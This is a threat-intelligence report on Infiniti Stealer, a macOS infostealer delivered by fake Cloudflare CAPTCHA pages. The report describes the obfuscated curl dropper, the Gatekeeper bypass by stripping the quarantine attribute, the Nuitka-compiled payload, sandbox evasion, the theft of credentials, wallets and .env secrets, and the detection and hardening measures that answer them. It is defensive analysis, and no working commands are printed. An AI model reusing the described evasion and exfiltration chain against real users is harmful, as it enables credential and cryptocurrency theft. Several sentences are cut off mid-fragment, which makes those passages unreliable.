Infiniti Stealer First macOS Infostealer Combining ClickFix Delivery with Nuitka-Compiled Python Payload

• .What: A new macOS infostealer combining ClickFix social engineering delivery with a Python 3.11 payload compiled via Nuitka into a native Mach-O binary - the first documented convergence of these two techniques on macOS.
• .Who: macOS users broadly targeted. Developer environments specifically targeted via .env file harvesting. No specific victim organizations named.
• .How: Fake Cloudflare CAPTCHA page on update-check[.]com tricks users into pasting a base64-obfuscated curl command into Terminal. Three-stage payload chain: bash dropper, Nuitka Mach-O loader, zstd-compressed Python stealer.
• .Data: Chromium and Firefox credentials (saved passwords, cookies, autofill), macOS Keychain entries, cryptocurrency wallets, developer .env files (API keys, database credentials, cloud secrets), screenshots.
• .Actor: Unknown. Operator panel accidentally exposed, revealing the malware's true name. No attribution to a known threat actor or group.
• .Impact: Credential theft enabling downstream account takeover, cryptocurrency theft, and potential enterprise network compromise via stolen developer secrets. Scale of infections unknown.

During routine threat hunting, Malwarebytes researchers discovered an undocumented macOS infostealer distributed through the ClickFix social engineering technique. The malware was initially tracked internally as NukeChain.

Shortly before Malwarebytes published its findings on March 26, 2026, the operator's control panel became publicly accessible on the internet, revealing the malware's actual name: Infiniti Stealer.

The accidental panel exposure confirmed this is not a one-off tool but a structured, actively operated campaign with a dedicated management interface.

The infection chain begins when a victim visits update-check[.]com - a domain hosting a near-perfect replica of a Cloudflare human verification page. The page presents what appears to be a standard "Verify you are human" CAPTCHA challenge.

Instead of clicking a checkbox, the user is instructed to open macOS Terminal and paste a provided command.

This is the ClickFix technique: rather than exploiting a software vulnerability, the attacker exploits user trust and compliance by disguising a malicious command as a routine verification step.

The command the user pastes is a base64-obfuscated curl request.

quarantine) that would otherwise trigger Gatekeeper warnings, executes the binary silently using nohup to prevent the process from terminating when Terminal closes, and passes the C2 server address and authentication token through environment variables rather than hardcoding them in the binary.

The script then deletes itself and closes Terminal - leaving no visible trace on the user's screen that anything has executed.

The stage-2 payload is an 8.6MB Apple Silicon Mach-O binary built using Nuitka's onefile mode. Nuitka is an open-source Python compiler that translates Python source code to C, then compiles the C code into a native binary. pyc files that analysts can readily decompile.

The Nuitka binary header contains the signature 4b 41 59 28 b5 2f fd - a KAY( header followed by a zstd magic number - indicating a Nuitka-packaged application with zstd-compressed embedded data.

The loader decompresses approximately 35MB of embedded data and hands execution to the final payload: UpdateHelper.bin, the Infiniti Stealer itself, also written in Python 3.11 and compiled with Nuitka.

Before initiating data collection, Infiniti Stealer performs anti-analysis checks. It detects virtualized and sandboxed environments including VMware, VirtualBox, and the automated analysis platforms any.run, Joe Sandbox, and Hybrid Analysis.

If the malware determines it is running in an analysis environment, it terminates without executing its stealing routines. It also introduces a randomized execution delay to avoid triggering automated detection systems that flag immediate post-execution network activity.

env files - plaintext configuration files commonly used by developers to store API keys, database credentials, cloud provider secrets, and authentication tokens.

env targeting is particularly significant: a single compromised developer workstation can yield credentials providing direct access to production cloud infrastructure, CI/CD pipelines, and SaaS platforms.

All harvested data is packaged and exfiltrated via HTTP POST requests to the command-and-control server. Upon successful upload, the malware sends a Telegram notification to the operator confirming the exfiltration is complete.

Harvested credentials are then queued for server-side password cracking - indicating the operation includes backend infrastructure for processing and monetizing stolen data at scale.

Infiniti Stealer does not exist in isolation. It arrives at a moment when the macOS infostealer ecosystem has undergone rapid expansion and the ClickFix social engineering technique has become one of the fastest-growing initial access vectors on the internet.

" The dominant families - Atomic Stealer (AMOS), Poseidon Stealer, Cthulhu Stealer, and Banshee Stealer - established the template: target browsers, Keychain, crypto wallets, and developer files, then sell access via Telegram and dark web forums as Malware-as-a-Service.

In February 2026, Microsoft Defender Experts published "Infostealers Without Borders," warning that macOS-targeted infostealer campaigns using ClickFix-style prompts and malicious DMG installers had accelerated since late 2025, with new families including DigitStealer, MacSync, and Phexia joining the established players.

Trend Micro documented Atomic Stealer being distributed through malicious OpenClaw skills - representing a new supply chain attack vector using AI agentic workflows.

The ClickFix technique itself has surged. ESET documented a 517% increase in ClickFix detections in the first half of 2025, with Mimecast independently corroborating a 500%+ surge.

Recorded Future, citing ESET data, assessed ClickFix detections increased by more than 500% between 2024 and 2025, documenting five distinct campaign clusters active in early 2026 - including campaigns impersonating Intuit QuickBooks, Booking.com, and macOS storage cleaning utilities.

Sophos X-Ops documented three separate ClickFix campaigns delivering the MacSync infostealer to macOS users between November 2025 and February 2026, including one that used legitimate ChatGPT shared conversations as landing pages.

Multiple state-sponsored groups have adopted ClickFix, including BlueDelta (APT28) and the North Korean group PurpleBravo.

What distinguishes Infiniti Stealer within this landscape is the combination of ClickFix delivery with Nuitka compilation.

Prior macOS ClickFix campaigns delivered stealers packaged with PyInstaller or as raw scripts - both of which are well-understood by analysts and can be decompiled or inspected with standard tooling.

Nuitka compilation translates the Python source to C and compiles it into a native binary, eliminating the bytecode layer that analysts rely on for rapid triage.

This is the same evasion advantage that Cyble documented in ApolloRAT - a Windows RAT compiled with Nuitka specifically to evade signature-based detection tuned for Python malware.

Infiniti Stealer is the first documented case of this technique being applied to a macOS stealer campaign.

• .Chromium-based browser credentials - Saved passwords, session cookies, autofill data, and credit card information stored by Chrome, Brave, Edge, Opera, and other Chromium-derived browsers. These credentials provide direct access to email accounts, banking portals, SaaS platforms, and social media accounts.

• .Firefox credentials - Saved passwords and session data stored in Firefox's credential store, which uses a different storage format than Chromium browsers.

• .macOS Keychain - The system-wide credential store containing Wi-Fi passwords, application passwords, certificates, secure notes, and any credential an application has stored using the Keychain API. Keychain extraction can yield credentials for VPNs, enterprise SSO systems, email clients, and development tools. The user password prompt triggered by the initial Terminal command likely provides the credential needed to unlock the Keychain.

• .Cryptocurrency wallets - Wallet files and private keys for cryptocurrency holdings. Cryptocurrency theft is immediate and irreversible - once private keys are exfiltrated, funds can be transferred within minutes with no recourse.

• .Developer .env files - Plaintext files containing environment variables used to configure applications. These commonly store AWS access keys, database connection strings, API tokens for Stripe, Twilio, SendGrid, and similar services, OAuth client secrets, and CI/CD pipeline credentials. A single .env file from a production developer workstation can provide direct access to cloud infrastructure, customer databases, and payment processing systems. This targeting makes Infiniti Stealer a potential enterprise breach vector, not merely a consumer credential stealer.

• .Screenshots - Display captures taken during execution that can reveal open applications, documents, banking sessions, email contents, and other information visible on screen at the time of infection.

1. Social engineering bypasses all technical controls. The ClickFix technique does not exploit a software vulnerability. It exploits a human one. The user voluntarily opens Terminal, pastes the command, and presses Return.

Gatekeeper, XProtect, Notarization, and System Integrity Protection are all designed to prevent unauthorized code execution - but none can intervene when the user manually executes a command in Terminal.

The entire macOS security architecture assumes the user will not voluntarily paste malicious commands into a root-capable shell. ClickFix invalidates that assumption.

2. Quarantine flag removal defeats Gatekeeper. quarantine extended attribute from the stage-2 binary before execution. This extended attribute is the mechanism by which macOS marks files downloaded from the internet for Gatekeeper inspection.

Without it, the binary executes without triggering the "this application was downloaded from the internet" warning dialog or Gatekeeper's signature verification. The dropper neutralizes macOS's primary first-run protection mechanism with a single xattr command.

3. Nuitka compilation evades signature-based detection. pyc files, or a bundled Python interpreter - the artifacts that endpoint detection tools use to identify and flag Python-based malware.

The resulting Mach-O binary presents the same profile as any legitimate compiled application. Detection engines tuned for PyInstaller bundles, py2app packages, or raw Python scripts will not trigger on Nuitka-compiled malware without purpose-built detection rules.

4. Environment variable C2 passing avoids static indicators. The C2 server address and authentication token are passed to the stage-2 binary through environment variables set by the bash dropper - not hardcoded in the binary.

Static analysis of the Mach-O binary will not reveal the C2 infrastructure. Analysts must capture the dropper script or observe runtime behavior to identify the C2 destination.

5. Anti-analysis checks prevent automated detonation. Infiniti Stealer checks for VMware, VirtualBox, any.run, Joe Sandbox, and Hybrid Analysis environments before executing its stealing routines.

Automated malware analysis sandboxes running in these environments will not observe the stealer's behavior - the malware will terminate cleanly, producing a benign-looking analysis report.

The randomized execution delay adds a timing-based evasion layer that can cause sandboxes with short execution timeouts to miss the malicious activity entirely.

6. Self-destruction eliminates forensic artifacts. The bash dropper deletes itself and closes Terminal after launching the stage-2 payload. The initial infection vector - the decoded curl command and bash script - is not preserved on disk for forensic recovery.

Incident responders arriving after infection will find no trace of the initial delivery mechanism unless Terminal command history was configured to persist (it is not by default in macOS).

7. Telegram notification enables real-time operator awareness. The Telegram notification upon successful exfiltration means the operator knows immediately when credentials are available for processing.

Combined with server-side password cracking, this enables rapid monetization - the operator can begin accessing victim accounts, draining cryptocurrency wallets, or selling credentials while the victim remains unaware of the compromise.

Delivery Infrastructure:

• .update-check[.]com - Fake Cloudflare CAPTCHA page

Delivery Technique:

• .ClickFix social engineering - victim pastes base64-obfuscated curl command in Terminal

Payload Chain:

• .Stage 1: Bash dropper via curl, strips com.apple.quarantine, self-destructs
• .Stage 2: 8.6MB Apple Silicon Mach-O binary compiled via Nuitka (Python 3.11)
• .Stage 3: 35MB zstd-compressed archive containing UpdateHelper.bin

Anti-Analysis:

• .VMware, VirtualBox, any.run, Joe Sandbox, Hybrid Analysis detection
• .Randomized execution delay

Targeted Data:

• .Chromium/Firefox credentials, macOS Keychain, cryptocurrency wallets, .env files, screenshots

Exfiltration:

• .HTTP POST to C2 (address passed via environment variable)
• .Telegram notification to operator on success

• .CCPA/CPRA (California Civil Code 1798.100 et seq.): If California residents are among the victims, the collection of browser credentials, Keychain entries, and .env files containing personal information triggers notification obligations. Fines of $7,500 per intentional violation. Developer .env files may contain customer database credentials, making the downstream exposure to customer PII a potential second-order CCPA event.

• .FTC Act Section 5: Organizations whose developer credentials are stolen via .env files, leading to downstream customer data breaches, face potential FTC enforcement for failure to implement reasonable security measures - particularly if .env files containing production credentials were stored on endpoint devices without encryption or access controls.

• .GDPR (Regulation 2016/679): If EU residents' credentials are harvested, Article 5(1)(f) integrity and confidentiality obligations are implicated. Organizations whose infrastructure is subsequently compromised via stolen developer credentials face Article 32 security-of-processing liability and 72-hour notification obligations under Article 33. Fines up to EUR 20M or 4% annual global turnover.

• .UK GDPR / DPA 2018: Same analysis for UK residents. ICO enforcement; fines up to GBP 17.5M or 4% turnover.

• .HIPAA (45 CFR Parts 160, 164): If healthcare developers' workstations are compromised and .env files contain credentials for systems storing protected health information, the resulting access constitutes a HIPAA breach. 60-day notification to HHS OCR and affected individuals. Fines up to $2.1M per violation category per year.

• .PCI DSS 4.0: Stolen browser credentials for payment processing portals, or .env files containing Stripe/payment API keys, create PCI DSS Requirement 8 (identification and authentication) exposure. Compromised payment credentials can lead to card-not-present fraud at scale.

• .Saudi Arabia PDPL: If Saudi residents are among victims or if compromised developer credentials provide access to systems processing Saudi personal data, SDAIA enforcement applies. Fines up to SAR 5M (~$1.3M).

• .UAE PDPL (Federal Decree-Law No. 45/2021): Same analysis for UAE residents. Fines up to AED 10M.

• .State Breach Notification Laws (US): Stolen credentials constituting personal information (usernames + passwords, financial account credentials) trigger notification obligations across all 50 states. Developer .env files creating downstream customer data exposure extend notification obligations to every affected customer.

The following gaps exist in the public record for this threat:

1. The operator behind Infiniti Stealer has not been identified or attributed to any known threat actor, group, or Malware-as-a-Service ecosystem.

The accidentally exposed control panel confirms operational infrastructure exists, but no connection to established stealer operations (AMOS, Banshee, Poseidon, Cthulhu) has been established.

2. The scale of infections is unknown.

Malwarebytes disclosed the malware's capabilities and delivery mechanism but did not publish telemetry on the number of infections observed, geographic distribution of victims, or the campaign's operational timeline beyond the March 26 disclosure date.

3. No file hashes (SHA-256, SHA-1, MD5), YARA rules, or network-based detection signatures have been published in the publicly available reporting. The Malwarebytes blog post may contain IOCs accessible only to subscribers or in a separate IOC feed.

Without hashes, defenders cannot perform retroactive hunting across their endpoint telemetry.

4. The specific cryptocurrency wallets targeted - whether Bitcoin, Ethereum, Solana, or wallet applications like MetaMask, Exodus, or Ledger Live - have not been enumerated in public reporting. This gap prevents cryptocurrency-specific protective monitoring.

5. Whether update-check[.]com is the sole distribution domain or one of multiple domains in a broader infrastructure remains unconfirmed.

The operator panel exposure suggests a more sophisticated operation than a single domain would support, but no additional infrastructure has been publicly documented.

The user opened Terminal and pasted a command. That is the entire initial access chain. No zero-day. No exploit. No privilege escalation. A fake CAPTCHA page asked a macOS user to do something, and they did it.

env file theft, the Telegram notification to the operator - all of it traces back to a single moment of misplaced trust in a verification dialog that looked like Cloudflare.

This is the operational reality that makes ClickFix one of the most effective initial access techniques active today. It bypasses every technical control in the macOS security stack simultaneously. Gatekeeper does not fire because the quarantine flag is stripped.

XProtect does not flag the binary because Nuitka compilation produces a native Mach-O executable with no Python bytecode signatures. Notarization is irrelevant because the user explicitly executed a Terminal command.

System Integrity Protection is irrelevant because no system files are modified. The macOS security architecture is designed to protect users from code that runs without their knowledge or consent.

ClickFix inverts the model: the user provides both knowledge and consent, unwittingly, in a single paste-and-return keystroke.

The defensive response begins with awareness. Employees across every role - not just technical staff - need to understand that legitimate services never ask users to open Terminal and paste commands.

This is not a message that a single annual security awareness training module will embed.

It requires targeted, repeated, scenario-based training that specifically demonstrates the ClickFix technique using examples that mimic what users will encounter: fake CAPTCHAs, fake software updates, fake verification dialogs.

Red team exercises should incorporate ClickFix lures to measure susceptibility rates and identify organizational blind spots.

If an organization's phishing simulation program tests only email-based attacks, it is missing the fastest-growing social engineering vector in the current landscape.

At the technical layer, endpoint detection and response platforms require purpose-built detection logic for Nuitka-compiled binaries. The default assumption that Python malware will present as PyInstaller bundles or raw scripts is no longer valid.

Nuitka produces native binaries with a distinctive file structure - the KAY( header followed by zstd-compressed data - that can be fingerprinted.

EDR rules should flag the combination of a downloaded Mach-O binary in /tmp with the quarantine attribute stripped, executed via nohup, and making outbound HTTP POST requests within minutes of first execution.

This behavioral chain is anomalous regardless of the binary's compilation method.

Developer workstations demand specific hardening.

env file targeting in Infiniti Stealer reflects a broader trend: infostealer operators have recognized that a single developer laptop can yield credentials to production cloud infrastructure, customer databases, and CI/CD pipelines - making developer compromise more valuable than thousands of consumer credentials.

env files on endpoint devices. Use secret management platforms - HashiCorp Vault, AWS Secrets Manager, 1Password for developers, Doppler - that inject secrets at runtime without persisting them to disk. env files containing production credentials.

If they exist today, assume they are the next thing an infostealer will harvest, because they are.

Browser credential storage represents another preventable exposure. Chromium and Firefox store credentials in databases that every macOS stealer family targets.

Enterprise password managers with browser extensions that replace the browser's native credential store - 1Password, Bitwarden, or Dashlane with organization-enforced policies - eliminate the credential database that stealers harvest.

Combine this with phishing-resistant authentication (FIDO2 hardware keys) for critical services.

Note that while FIDO2 prevents credential phishing, Sophos correctly identified that FIDO2 does not prevent ClickFix attacks - the attack does not intercept authentication; it installs malware.

FIDO2 protects the accounts the stealer tries to access after harvesting credentials, not the initial infection.

macOS MDM solutions - Jamf Pro, Mosyle, Kandji - should enforce policies that restrict Terminal command execution on managed devices, require explicit administrator approval for unsigned binaries, and prevent quarantine attribute removal.

quarantine operations performed on recently downloaded files. Monitor for nohup execution of binaries in /tmp.

These are the specific behavioral indicators of the Infiniti Stealer kill chain, and they are generic enough to detect future ClickFix campaigns regardless of the final payload.

Malwarebytes, BleepingComputer, CybersecurityNews, GBHackers, Cryptika, Cyber Security Review, Sophos X-Ops, Recorded Future, Palo Alto Networks Unit 42, Microsoft Security Blog, Cyble, Intego, Red Canary, SentinelOne, Check Point Research, Kaspersky